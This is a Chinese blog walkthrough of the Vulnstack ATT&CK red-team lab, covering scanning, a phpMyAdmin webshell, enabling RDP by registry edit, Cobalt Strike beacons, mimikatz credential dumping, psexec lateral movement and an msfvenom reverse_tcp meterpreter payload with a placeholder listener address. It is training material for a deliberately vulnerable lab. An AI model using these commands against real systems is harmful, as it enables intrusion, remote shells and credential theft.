ATT&CK红队评估实战靶场(一)

最新推荐文章于 2024-06-21 02:25:46 发布
最新推荐文章于 2024-06-21 02:25:46 发布
阅读量4.7k 收藏 8
点赞数 2
分类专栏: # web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45951598/article/details/113775696
版权

文章目录

前言

靶机下载地址:ATT&CK红队评估实战靶场
拓扑图:
在这里插入图片描述
通过模拟真实环境搭建的漏洞靶场,完全模拟ATK&CK攻击链路进行搭建,形成完整个闭环。虚拟机默认密码为hongrisec@2019。

环境搭建

名字hostpasswd说明
windos7192.168.93.160/24 192.168.142.128/24hongrisec@2019web服务器
win2K2192.168.142.129/24hongrisec@2020域成员
windows server 2008 r2192.168.142.130/24hongrisec@2020域控制器
kali192.168.93.129/24kaliattack

在这里插入图片描述

测试网络连通性

windows7 ping win2k2 、 windows server 2012
在这里插入图片描述
这里win2k2互相ping
在这里插入图片描述
在这里插入图片描述
kali机与WEB联通
这里因为win7开了防火墙ping不通。

攻入内网

信息收集

探测同网段主机存活

nmap -sT 192.168.93.160
在这里插入图片描述

探测端口

nmap -sT 192.168.68.160
在这里插入图片描述

操作系统、版本

nmap –T4 –A
在这里插入图片描述

利用可用端口

经过前面的扫描发现80端口开启这里我们直接访问。
在这里插入图片描述
这里发现一个php探针,好家伙基本信息都在这里了,还要扫描信息收集吗?
但是看了一眼发现还是没有网站目录,这里直接用工具扫描,这里用的工具是dirsearch

./dirsearch.py -u 192.168.93.160 e*
在这里插入图片描述

漏洞一_信息泄露+弱口令

在这里插入图片描述

漏洞二_存储型XSS

在这里插入图片描述

在这里插入图片描述
需要后台审核,用来获取管理员cookie。

漏洞三_任意修改文件

在这里插入图片描述
在这里插入图片描述
蚂蚁剑直接连接

漏洞四_phpadmin文件写入

通过 phpmyadmin getshell参考链接
然后这里探针这里暴露了绝对路径。
在这里插入图片描述
然后直接根据上面那篇文章,getshell。

在这里插入图片描述

远程连接

这是在win7上进行的,根本没有打进win7的内网。利用蚁剑终端,查看开启端口,并给win7添加用户,之后要用3389远程连接桌面:
在这里插入图片描述
这里没有开启端口,我们直接百度一下。

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

在这里插入图片描述

接下来创建用户,把用户加入管理员组获得权限。
在这里插入图片描述
先关一下防火墙
在这里插入图片描述
在这里插入图片描述

参考文章:内网渗透学习导航

域信息收集

一、什么是域

域是计算机网络的一种形式,其中所有用户帐户 ,计算机,打印机和其他安全主体都在位于称为域控制器的一个或多个中央计算机集群上的中央数据库中注册。 身份验证在域控制器上进行。 在域中使用计算机的每个人都会收到一个唯一的用户帐户,然后可以为该帐户分配对该域内资源的访问权限。 从Windows Server 2003开始 , Active Directory是负责维护该中央数据库的Windows组件。Windows域的概念与工作组的概念形成对比,在该工作组中,每台计算机都维护自己的安全主体数据库。

kali先启动cs
启动服务端
在这里插入图片描述
启动客户端
在这里插入图片描述
在Attacks->packags下的windows executable(s)选择监听,创建个木马
在这里插入图片描述
生成一个txt文件在主机powershell里运行
在这里插入图片描述
成功上线

判断是否存在域

使用 ipconfig /all 查看 DNS 服务器:

shell ipconfig /all

在这里插入图片描述
发现 DNS 服务器名为 god.org,查看域信息:net view

shell net view

在这里插入图片描述
查看主域信息:net view /domain

shell net view /domain

在这里插入图片描述
查询当前的登录域与用户信息:net config workstation
在这里插入图片描述
可以很清楚看出有无域。
使用 dump hash模块导出散列值,获取凭据 (access->dump hashs)
在这里插入图片描述
使用logonpasswords模块,调用内置在CS中的mimikatz将内存中的lsass.exe进程保存的用户明文密码和散列导出
在这里插入图片描述
在这里插入图片描述

横向移动

接下来就是横向移动,但是由于内网机是无法直接和外网连接的,这将win7当成跳板机。

官网介绍:SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。
因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。
在这里插入图片描述
首先新建一个监听
在这里插入图片描述
然后使用之前获取的主机信息和凭据,使用psexec模块进行登入。
在这里插入图片描述
在这里插入图片描述
成功上线
在这里插入图片描述

MSF反弹shell

参考文章:链接
植入windows后门:

>payload:msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

在这里插入图片描述
在msfconsole中进行配置
在这里插入图片描述
在这里插入图片描述
windows7执行
在这里插入图片描述
在这里插入图片描述

multi4
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ATT&CK红队评估实战靶场(一)
qq_53263789的博客
05-16 636
写在前面的话 第一次尝试这种渗透靶场,还是在考试的三天中完成的,会接着进行其他的靶场(真是又菜又爱玩) 靶场地址:vulunstack 靶场搭建 Win7:密码: cys121` 外网192.168.47.132 内网 192.168.52.143 Win2008 密码:cys121` 内网 192.168.52.138 Win2003 密码:cys121` 内网 192.168.52.141 经过互相ping 内网三台机器可以互相ping通 Kali 外网 192.168.
蓝队----att&ck&IDS&蜜罐&威胁情报
qi_SJQ_的博客
02-27 971
hw中各种规则都能在各种hw资料里看到,不再熬yu 蓝队涉及到的技术涉及到应急、溯源、反制、情报、写报告、了解设备等综合性知识。 1.att&ck了解: 外国文档:https://attack.mitre.org/ 视频科普:https://www.zhihu.com/zvideo/1305977738013540352 2.蜜罐技术: 免费蜜罐 HFish:https://hfish.io/ github地址:https://github.com/hacklcx/HFish 部署、使用见官方文.
红日靶场-ATT&CK实战系列-红队评估(一)
最新发布
m0_66638011的博客
06-21 860
红日靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。红日靶机主要以内网渗透学习为主。红日靶场的网络结构复杂多样,包括外网、内网、DMZ区域等。不同的网络区域之间通过防火墙、路由器等设备进行隔离和访问控制。靶场网络结构中还包括了各种服务器和网络设备,如Web服务器、数据库服务器、文件服务器等。
云原生Att&ck矩阵
weixin_45540609的博客
08-10 1684
转载自:https://developer.aliyun.com/article/765449?groupCode=aliyunsecurity 一、云上容器ATT&CK攻防矩阵概览 ATTCK®框架(Reference ATTACK Matrix for Container on Cloud)是网络攻击中涉及的已知策略和技术的知识库。为便于企业构建容器化应用安全体系,阿里云在传统主机安全的基础上,围绕自建容器集群以及云原生容器服务场景,通过全面分析黑客攻击Docker和K8s的过程和手段,推
ATT&CK框架入门总结
明光札记
03-17 4103
ATT&CK框架入门简介
ATT&CK靶场系列(七)
qq_1873822的博客
12-04 6944
一、环境配置 vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/9/ DMZ区IP段为192.168.1.1/24 第二层网络环境IP段为192.168.52.1/24 第三层网络环境IP段为192.168.93.1/24 按着上面的图片把相关的ip段给配置就行 DMZ区域: 给Ubuntu (Web 1) 配置了两个网卡,一个可以对外提供服务;一个连接第二层网络。 第二层网络区域: 给U
ATT&CK手册(修改版)
09-16
8. **企业应用**:企业可以利用ATT&CK框架评估自身安全态势,进行风险分析,并设计相应的防御措施。 9. **教育与培训**:对于网络安全专业人士,ATT&CK手册是宝贵的教育资源,可以帮助他们提高对攻击行为的理解,...
ATT&CK中文手册.zip
11-24
一、Initial Access(入口点) 二、Execution(命令执行) 三、Persistence(持久化) 四、Privilege Escalation(权限提升) 五、Defense Evasion(绕过防御) 六、Credential Access(获取凭证) 七、Discovery(基础信息收集) ...
ATT&CK.红队战术漫谈.pdf
09-09
ATT&CK.红队战术漫谈
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
05-27
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
Vulnstack----1、ATT&CK红队评估实战靶场
七天
08-01 1249
3、敏感目录:http://192.168.144.132/phpMyadmin。4、发现yxcms:http://192.168.144.132/yxcms。192.168.52.143:存在MS17-010。192.168.52.138:存在MS17-010。域用户:dev1、root-tvi862ubeh。win7内网ip:192.168.52.143。1、ip地址:192.168.144.132。内网ip地址:192.168.52.143。内网网段:192.168.52.0/24。
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记
热门推荐
ierciyuan的博客
08-01 1万+
内网渗透实战攻打红日靶场第一关,包括环境配置、信息收集、漏洞利用、内网信息收集、内网攻击、横向移动等操作。
1.ATT&CK入门
07-25 2167
源:https://attack.mitre.org/resources/getting-started/  官方:https://attack.mitre.org 生于MITER,在2015-5发布 TTP:针对windows企业APT威胁 FMX:红队行为 矩阵框架:1.对手行为 2.尝试防御先进杀戮链 3.真实环境 4.术语整合 进攻与防御协同工作。对抗技术知识库...
ATT&CK红队评估实战靶场(一)靶场搭建和模拟攻击过程全过程
weixin_44286136的博客
09-30 2861
ATT&CK红队评估实战靶场(一) 0x01 前言 本靶机环境是红日团队开源的一个红队实战测试环境,靶机下载地址如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 通过模拟真实环境搭建的漏洞靶场,完全模拟ATK&CK攻击链路进行搭建,形成完整个闭环。虚拟机默认密码为hongrisec@2019 0x02 环境搭建 WEB服务器:windows7系统 外网网卡IP:192.168.31.59 内网网卡IP:192.168.52.143
ATT&CK红队评估实战内网靶场(一) VulnStack-1
永不垂头的博客
08-18 2844
ATT&CK红队评估实战内网靶场(一) VulnStack-1 文章目录ATT&CK红队评估实战内网靶场(一) VulnStack-1前言一、win 71.yxcms二、信息收集1.本机信息收集2.域信息收集三、关闭防火墙1.进入内网2.代理3.ms17-0104.mimikatz四、我的公众号 前言 Onebug.org | 安全防线 ATT&CK红队评估实战内网靶场(一) VulnStack-1 参考网址:https://www.onebug.org/vulnstudy/99
【精选】ATK&CK红队评估实战靶场一 超详细过程思路
人若无名,便可专心练剑
11-30 456
"护网行动"通常指的是针对网络安全和信息安全的行动。这种行动可能是由政府、组织或社区发起的,旨在保护网络系统和数据免受未经授权的访问、损坏或窃取。这些行动可能涉及加强网络防御、加强密码管理、加强安全意识培训以及制定相关法律法规。实施护网行动是确保网络安全的重要举措,以应对不断增长的网络威胁和攻击。
红队攻防知识分享-红日安全团队靶场1
beirry的博客
03-23 8184
环境搭建 靶场链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 环境拓扑图: 以下是虚拟机网络配置 虚拟机 网络配置 Windows7 x64 VMnet1:192.168.52.128;VMnet2:192.168.54.128 Win2k3 Measploitable VMnet1:192.168.52.141 Windows Server 2008 R2 x64 VMnet1:192.168.52.138 kali V
ATT\\\\&CK红队评估实战靶场
08-16
ATT&CK红队评估实战靶场四是一个实战训练场景,其中使用了phpmyadmin来利用数据库日志写入马来获取会话。具体的方法和之前的红日靶场一类似,你可以去查看相关链接了解更多细节。在攻击机要访问52网段的资源时,可以使用session 4作为下一跳进行路由设置。可以通过routeprint命令查看路由表,并使用routeadd命令添加相应的路由。此外,可以通过将SSH公钥添加到/home/ubuntu/.ssh/authorized_keys文件来实现免密登录到目标机器。具体命令是将SSH公钥追加到该文件中。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [ATT&CK红队评估(红日靶场四)](https://blog.csdn.net/weixin_45682839/article/details/124485070)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* [ATT&CK红队评估实战靶场-1(全网最细)](https://blog.csdn.net/qq_40638006/article/details/122033546)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值